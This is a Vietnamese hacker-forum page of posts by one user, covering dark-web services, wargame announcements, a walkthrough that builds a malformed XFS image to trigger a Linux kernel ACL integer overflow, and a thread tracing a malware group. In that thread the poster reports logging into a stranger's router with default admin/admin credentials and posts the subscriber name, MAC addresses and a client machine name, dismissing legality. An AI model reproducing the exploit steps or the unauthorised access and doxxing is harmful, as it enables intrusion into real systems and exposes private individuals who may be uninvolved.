banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: cr4zyb0y  XML
Profile for cr4zyb0y Messages posted by cr4zyb0y [ number of posts not being displayed on this page: 0 ]
 
nó troll anh đó anh conmale ơi smilie

idid231 wrote:
Vậy đối tượng hướng tới của Web Ẩn chỉ là những kẻ siêu tin học? Bởi có giỏi thì mới tìm thấy dạng web như vậy.
Mà em cũng chưa hiểu loại web này phục vụ mục đích gì. Người quản trị thường muốn tăng rank cho site của mình, đằng này lại muốn Ẩn đi, chắc chỉ toàn mục đích đen tối.
Các trang dạng "phải xác thực truy cập" không rõ là tiếp thị bằng cách nào để đem về nguồn thu nhỉ? Bởi em thấy porn thì nhiều trang bị crack acc lắm, bảo mật không cao thì khách chạy hết mất. 


Mục tiêu của Web Ẩn* là Ẩn, còn về đối tượng thì không có giới hạn. Ai có nhu cầu thì sử dụng thôi.

Không cần giỏi mới tìm thấy, chỉ cần biết thì vào thôi.

Vì là ẩn danh trên mạng này, nên các website trong mạng ẩn này hầu hết là phục vụ các dịch vụ như bán hacked credit card, các thể loại giải trí khiêu dâm, các dịch vụ hack thuê, còn có cả dịch vụ viết paper, tìm tài liệu thuê nữa smilie.

* mình chỉ nói phần web ẩn hướng tới tính ẩn danh của người dùng, phần lớn còn lại là các web nội bộ của doanh nghiệp, chính phủ, tổ chức ... thì không vào được nên không đề cập ở đây.
Một challenge mới được ra mắt : http://wargame.vn/login.html

Mời các bạn tiếp tục.

Goodluck !
từ trước đến giờ các bạn đã nghe XSS, vậy XSS là gì, chúng nguy hiểm như thế nào, và một khi một trang web nào đó bị lỗi XSS thì làm sao mà khai thác.

tụi mình vừa ra một loạt các thử thách liên quan đến XSS ở : http://bkitsec.vn/?topic=web-level3-xsshuh

liệu có thể kiếm soát trang web chỉ qua XSS, các bạn hãy thử xem.

P/S : link trên sẽ hiện 404 nếu bạn chưa đăng nhập.
Một lỗi bảo mật khá cơ bản được tìm ra trong mã nguồn của Linux kernel trong việc thao tác XFS file system.

Trong linux/fs/xfs/xfs_acl.c :

Code:
STATIC struct posix_acl *
xfs_acl_from_disk(struct xfs_acl *aclp)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
struct xfs_acl_entry *ace;
int count, i;
count = be32_to_cpu(aclp->acl_cnt);
acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);
for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
...
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
...
}
return acl;
...
}


Trong posix_acl_alloc chúng ta có:

Code:
struct posix_acl *
posix_acl_alloc(int count, gfp_t flags)
{
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);
struct posix_acl *acl = kmalloc(size, flags);
if (acl)
posix_acl_init(acl, count);
return acl;
}


Như vậy biến count được khai báo là kiểu Interger. Biến size được tính toán dựa trên :

Code:
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);


Vấn đề xảy ra khi count quá lớn, dẫn tới phép toán này gây ra tràn số, size sẽ < count. Lúc này bộ nhớ được cấp phát sẽ nhỏ hơn thực tế mà chương trình sử dụng ở:
Code:
for (i = 0; i < count; i++) {
......


Tử đây một lỗi tràn bộ đệm sẽ xảy ra. Kết quả là kernel panic hoặc có thể dẫn tới thực thi mã ( code execution ) ở mức kernel.
Nếu hệ thống có hỗ trợ automount XFS file system, khi chúng ta chuẩn bị một đĩa USB với định dạng XFS với các thông số và mã khai thác phù hợp sẽ dẫn tới lấy quyền root ( vì module này chạy với quyền của kernel) hoặc ít nhất có thể làm crash hệ thống đó.
Mình thấy bug này khá thú vị và nhân tiện cũng muốn hướng dẫn các bạn cách viết exploit cho kernel driver ( nhưng cái như local root mà các bạn hay xài).
Trước tiên chúng ta tạo ra 1 xfs file system chuẩn:

Code:
[root@vulnBox xfs]# dd if=/dev/zero of=expl bs=1M count=40
40+0 records in
40+0 records out
41943040 bytes (42 MB) copied, 0.0600407 s, 699 MB/s
[root@vulnBox xfs]# mkfs.xfs expl
meta-data=expl isize=256 agcount=2, agsize=5120 blks
= sectsz=512 attr=2, projid32bit=0
data = bsize=4096 blocks=10240, imaxpct=25
= sunit=0 swidth=0 blks
naming =version 2 bsize=4096 ascii-ci=0
log =internal log bsize=4096 blocks=1200, version=2
= sectsz=512 sunit=0 blks, lazy-count=1
realtime =none extsz=4096 blocks=0, rtextents=0
[root@vulnBox xfs]#


Tiếp theo, mount nó ra và tạo 1 file rồi thay đổi ACL cho nó( vì phần bị lỗi ở xfs_acl):

Code:
[root@vulnBox xfs]# mount expl /mnt/tm/
[root@vulnBox xfs]# echo "coolExploit" > /mnt/tm/hellosuto
[root@vulnBox xfs]# setfacl -m u:user:rw- /mnt/tm/hellosuto
[root@vulnBox xfs]# getfattr -e hex -dm '.*' /mnt/tm/hellosuto
getfattr: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
security.selinux=0x756e636f6e66696e65645f753a6f626a6563745f723a66696c655f743a733000
system.posix_acl_access=0x0200000001000600ffffffff02000600e803000004000400ffffffff10000600ffffffff20000400ffffffff
trusted.SGI_ACL_FILE=0x0000000500000001ffffffff0006000000000002000003e80006000000000004ffffffff0004000000000010ffffffff0006000000000020ffffffff00040000
[root@vulnBox xfs]# getfacl /mnt/tm/hellosuto
getfacl: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
# owner: root
# group: root
user::rw-
user:user:rw-
group::r--
mask::rw-
other::r--


Mở ra bằng 1 hex editor và thay đổi:

Code:
0000DF60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................................
0000DF80 00 00 00 00 00 40 0C 53 47 49 5F 41 43 4C 5F 46 49 4C 45 00 00 00 05 00 00 00 01 FF FF FF FF 00 .....@.SGI_ACL_FILE.............


Từ :
49 4C 45 00 00 00 05
49 4C 45 40 00 00 00
để chuyển số lượng ACL entry từ 5 sang 0×40000000.
Và :

Code:
[ 4107.439000] BUG: unable to handle kernel paging request at ffffffff
[ 4107.439015] IP: [<c04df18e>] __kmalloc+0x9d/0xff
[ 4107.439023] *pde = 00ffc067 *pte = 00000000
[ 4107.439023] Oops: 0000 [#1] SMP
[ 4107.439023] Modules linked in: xfs fcoe libfcoe 8021q garp stp llc lockd libfc scsi_transport_fc scsi_tgt ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 nf_conntrack_ipv4 nf_defrag_ipv4 ip6table_filter xt_state ip6_tables nf_conntrack ppdev snd_intel8x0 snd_ac97_codec ac97_bus snd_seq snd_seq_device parport_pc snd_pcm snd_timer snd soundcore joydev i2c_piix4 microcode i2c_core parport e1000 snd_page_alloc sunrpc uinput [last unloaded: scsi_wait_scan]


Như vậy chúng ta đã có sample để trigger bug này, phần tiếp theo các bạn có thể theo dõi ở : http://bkitsec.vn .
Hi các bạn,

thử thách thứ 2 đã ra lò - một thử thách về web hacking. Các bạn có thể tìm hiểu thêm tại :

[1st Chal] Targeted Attack level 1 http://bkitsec.vn/?topic=1st-chal-targeted-attack-level-1
[Web 1st]Let's Hack http://bkitsec.vn/?topic=web-1stlets-hack
hi anh,

các thông tin đó em thấy mọi quá trình đăng ký nào cũng yêu cầu, đâu phải là duy nhất tụi em đâu.

vả lại, để đảm bảo chất lượng, đồng thời thể hiện sự nghiêm túc của các bạn muốn tham gia thì việc tự gửi một lá thư như vậy là cần thiết.

thân !
Chào các bạn,

Làm thế nào để tận dụng lỗi phần mềm /hvaonline/posts/list/38052.html), hẳn các bạn đã từng đọc qua loạt bài dịch này của mod Ky0. Và các bạn cũng hình dung được trong đầu mình rằng : " à, khai thác lỗi phần mềm là thế đấy, thế đấy ...." . Nhưng vấn đề gặp phải ở hầu hết mọi người là môi trường thực nghiệm và chỗ trao đổi những vấn đề cụ thể trong quá trình các bạn tìm hiểu .

Với mục đích hỗ trợ, và tạo môi trường cho các bạn cũng chia sẻ, nghiên cứu và thực hành. Tụi mình, nhóm BkitSec http://bkitsec.vn), đã quyết định tạo một diễn đàn nhỏ http://bkitsec.vn/?post_type=forum). Ở diễn đàn này, hằng tuần sẽ có các "thử thách" ra lò dưới dạng wargame để các bạn có thể luyện tập. Trong khi đó vẫn có thể trao đổi và học hỏi kinh nghiệm qua diễn đàn.

Các "thử thách" sẽ đủ các chủng loại :
  • Tận dụng lỗi phần mềm (thường thấy nhất, là các ứng dụng chạy trên các hệ điều hành dòng *nix, windows )
  • Khai thác lỗi từ ứng dụng web
  • Mã hóa
  • Malware analysis
  • ...


Và với sự hỗ trợ từ các đàn anh từ nhóm VNsecurity http://vnsecurity.net), tụi mình hi vọng sẽ tạo ra một sân chơi bổ ích cho các bạn hackers.

P/S : Các kiến thức cơ bản và nền tảng về KHMT , các bạn vẫn có thể trao đổi ở diễn đàn, tụi mình rất vui khi được chia sẽ cùng các bạn.

Cảm ơn mọi người.
vì người chơi trước nghĩ cho người chơi sau, và để game luôn luôn mới smilie
có một luật ngầm của giới chơi wargame loại này là không bao giờ viết ra lời giải, hoặc để thông tin mật khẩu ra như bạn

quangteospk wrote:
Cá nhân mình cũng thấy điều này là không cần thiết. Tài liệu bạn search GG ra rất là nhiều, mọi người có thể dễ dàng làm điều này. Hơn nưa một số tài liệu của NhatNghe, VnPro, SaigonCTT thì cũng có "bản quyền" của họ, mà chính forum của họ cũng có share rồi.
Còn nói về sách, trong HVA cũng có topic chia sẻ ebook tiếng Anh của một bạn nào đó rồi. Ai cần vô đó tìm kiếm thêm.
Hơn nữa cái khẩu hiệu hô hào của bạn nghe rất "buồn cười". Bởi sách, tài liệu không phải là đồ chùa. Bạn có thể down ở một nguồn free nào đó, đọc nó, phục vụ cho mục đích của cá nhân bạn. Chứ đừng đem những thứ "chùa", "lậu" ra mà hô hào vì một tinh thần chia sẻ.
Cá nhân mình thấy việc tìm kiếm tài liệu cũng "lòi" ra một số điểm hay ho. Việc một người học IT mà ko biết search GG là mệt rồi smilie
Vài dòng tâm sự.
 


Chào bạn, thay vì chỉ ra điểm dở, thì sao lại không góp ý để loại bỏ những điểm dở đó nhỉ. Và cũng qua ý kiến của bạn, mình không thấy bạn có chút suy nghĩ nào cả.

Đồng ý là tài liệu thì rất nhiều, tuy nhiên vấn đề tổng hợp và chọn lọc thì không phải ai cũng làm được. Và cái quan trọng hơn, là những tài liệu hay, đã được bạn đọc và chiêm nghiệm chẳng hạn, bạn giới thiệu lại cho những người khác thì phần giá trị của tài liệu ấy còn cao hơn nữa.

Nói về vấn đề bản quyền thì cũng có rất nhiều cách giải quyết khác nhau :
Thứ nhất, có rất nhiều tài liệu miễn phí và rất hay, rất cần được chia sẻ.
Thứ hai, hệ thống chia sẻ này sẽ không chấp nhận "lưu trữ" bất kì tài liệu bản quyền nào, bạn có thể viết giới thiệu và cung cấp đường dẫn đến tài liệu. Và vì là do đóng góp của cộng đồng, trách nhiệm thuộc về mỗi thành viên chứ không phải là của hệ thống.

Mình nghĩ cái hay nếu có hệ thống này, và hệ thống này hoạt động tốt, là ở chỗ nó phân loại và chuyên môn hóa được các tài liệu.
chẹp, ai viết cái proxy.php ghia vậy trời.

rm proxy.php
bọn STL cũng ghê gớm nhỉ, đánh giằng mặt cơ đấy smilie)

cài thèn gentoo ở máy nào xong thì nhớ backup mấy cái config lại cất, để nhỡ có bề gì cài lại thì chứ copy vô mà quất thôi.

gentoo để mà chạy được (without GUI) thì cài có tí chứ mấy, mà thêm em X11 + gnome/kde/... thì khổ vl ra. và vấn đề quay ngược lại là phải đi tìm hiểu mấy cái phần cứng mouse/keyboard/GPU linh tinh để cài cho đúng.

nhiều bác nản là nản chỗ này thôi.

mà trên gentoo wiki, nó cũng có nhiều bài viết hướng dẫn chi tiết cho từng dòng máy một, giảm bớt cho ta phần nào công sức .

exception wrote:
Nói đi nói lại, thực ra STL là người của ai thì mọi người cũng lờ mờ đoán ra rồi. Nhưng chẳng lẽ một nhóm được đầu tư tiền bạc, thời gian như thế mà lại làm ra các sản phẩm "gà mờ" như thế sao (qua các bài phân tích của anh TQN)? Có lẽ tiền của người đầu tư rơi nhầm chỗ rồi thì phải :lolz

Nhưng thôi, quay lại chủ đề kỹ thuật, anh TQN cho em xin ít mẫu xem nào. Sẵn tiện đang free không có gì phải làm đây.  


bác đoán là ai vậy, em thì chịu.

còn chiện vung tiền, đầu tư nhìu mà sản phẩm gà mờ như bác nói thì ngoài đường thiếu gì, hay là bác hiện không ở VN smilie

mv1098 wrote:

TQN wrote:
Cảm ơn anh conmale đã lên tiếng. Bà con đừng hùa nhau vào chửi rũa tohoangvu. Biết đâu chính tohoangvu cũng là nạn nhân của STL hay ai khác thì sao.
Cái thằng giấu mặt là thằng này nè: 123.21.140.237 


TQN không hiểu vấn đề hay là vờ không hiểu để chọc mình smilie

cái ip 192.168.x.x là cái ip modem cấp cho các máy client cắm vào nó ( ip LAN ), còn cái ip 123.21.140.237 là do ISP cấp cho modem của khách hàng khi kết nối vào internet ( ip WAN )

Mà các thuê bao ADSL thường là IP động chứ không phải ip tĩnh nên khi reset modem thì ISP sẽ cũng cấp 1 ip mới chứ không phải ip cũ nữa.

Bác truy cập vào trang http://checkmyip.com/ xem ip của mình là gì, sau đó reset modem, clear cache của trình duyệt rồi vào lại trang đó bác sẽ thấy ip thay đổi

ps: lúc đầu bác vào check port có để ý nó là modem Zoom X5 không, giờ nó là modem TP-Link khác hoàn toàn, không lẽ anh ta thay luôn cả modem

 


không đọc những gì mình viết trên kia à, mình có nói rỏ ràng 2 giả thiết nếu ip 123.21.140.237 đã/chưa assign cho thèn khác thì tình huống sẽ khác mà.

còn vi phạm pháp luật mẹ gì mình không care, vì mấy anh công an mạng chả quan tâm gì tới mấy cái mình làm đâu smilie , nếu có thì đập tụi STL có ích hơn. tội phát tán malware là đi tù như chơi ấy chứ nhỉ smilie

TQN wrote:
Hì hì, vậy là cái modem của cậu ngokiennam này đặt default pasword rồi, phải không cr4zyb0y ?
Còn cái tên wujianan này nữa, đặc sệt tàu khựa ! 


default anh, em đổi nó rồi, nếu ai cần thì pri message cho mình.

nếu giả thiết của em về ip đó đã assign cho 1 user khác, không phải của tụi STL thì cũng không có gì khai thác, ngược lại thì chém thôi smilie)
và một điều nữa, có thể ip 123.21.140.237 đã được assign cho 1 user khác của vnpt .


tuy nhiên, có 1 cặp ip + time thì hiển nhiên công an nếu muốn túm thèn STL đó thì cũng không phải là điều gì quá khó khăn.
chủ thuê bao vnpt của ip 123.21.140.237 là ngokiennam / megavnn1


Device Information

Firmware Version

:
1.0.2 Build 080513 Rel.58514

MAC Address

:
00:23:cd:c8:95:50 


lúc mình vào thì có 1 cái máy đang sài là

wujianan-PC 192.168.1.100 00-24-1D-88-E4-79 








còn đây là hai cái video : http://www.mediafire.com/?znh340c70id3jac

còn tohoangvu có bị mất mail không thì không biết. vì mình sms với ảnh thì ảnh nói là "are you hacker my email", nhưng mình hỏi là email nào thì ảnh lại lờ đi ...
cái ip 123.21.140.237 admin/admin dô đc mà ta
lão tohoangvu này gần nhà mình ở QN, để khi nào về offline sinh tử lệnh tám chơi.

xx
Nhận xét trên chỉ nói đến vấn đề lưu mật khẩu của IM client thôi mà, đâu có nhắc gì đến chuyện IM hay bất cứ giao thức dùng trong IM đâu.

đoạn trên là đoạn xử lý login, còn đoạn post bài đâu smilie

còn nếu muốn auto post bài thì thay vì làm các bước login này nọ, bạn dùng cái này http://docs.python.org/library/cookielib.html nữa.

Bạn thử để trống vb_login_md5password và vb_login_md5password_utf (hoặc bỏ hẳn, không định nghĩa hai trường đó trong dict luôn), ngoài ra điền username và password (chưa mã hóa) của bạn vào vb_login_username và vb_login_password xem sao.  


vbb nó có cái javascript md5 cái pass rồi mới gửi lên server xử lý tiếp đó anh iu ^^ .
cái log của yahoo nó có lưu IP luôn đó anh TQN, anh post lên luôn đi .
Comodo Internet Security Pro , free 1 năm mà. Tích hợp antivirus, firewall ... rất hay smilie
Có 4 nguyên tắc cơ bản : bảo mật, toàn vẹn, sẵn dụng và xác thực . bạn Ar0 có thể tham khảo thêm tại http://en.wikipedia.org/wiki/Information_security
Tham khảo thêm :
- SyScan'10 Ho Chi Minh: KICKING THE VULNERABILITIES OUT OF MICROSOFT PATCHES ( http://www.youtube.com/watch?v=YpqjfKUpQIM )
- Slides ( http://www.mediafire.com/?vpttn658xs57gdr )
- 0ne-day exploit
abc http://crazyboy.bshellz.net/cgi-bin/checkpass.py game đã trở lại, anh em thích thì chiến nha smilie)
thành thật mà nói, cái mà được gọi là tư duy của kimchinh_no1 là thứ mà cần phải được rèn luyện, trao dồi. Và tuỳ cơ địa mỗi người, mỗi hoàn cảnh mà người ta có cách suy nghĩ, tư duy riêng.

Kinh nghiệm có thể truyền đạt, nhưng tư duy thì mình nghĩ là không. thử hỏi (anh conmale chẳng hạn) lúc trước, khi anh ấy bắt đầu, anh ấy đã cố gắng như thế nào, rèn luyện như thế nào, anh ấy có ai chỉ, ai bảo về tư duy không mà anh ấy vẫn thành công ?

Đời này ngắn lắm, hết 1/3 rồi mà còn ngồi đây đi tìm hướng tư duy này nọ thì bao giờ mới sống thực sự. sao không thử lăng xả, sống hết mình thử xem, đừng có quan tâm gì hết, chỉ sống, học tập và làm việc hết mình, và vui là được.
qua tết chơi tiếp !
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|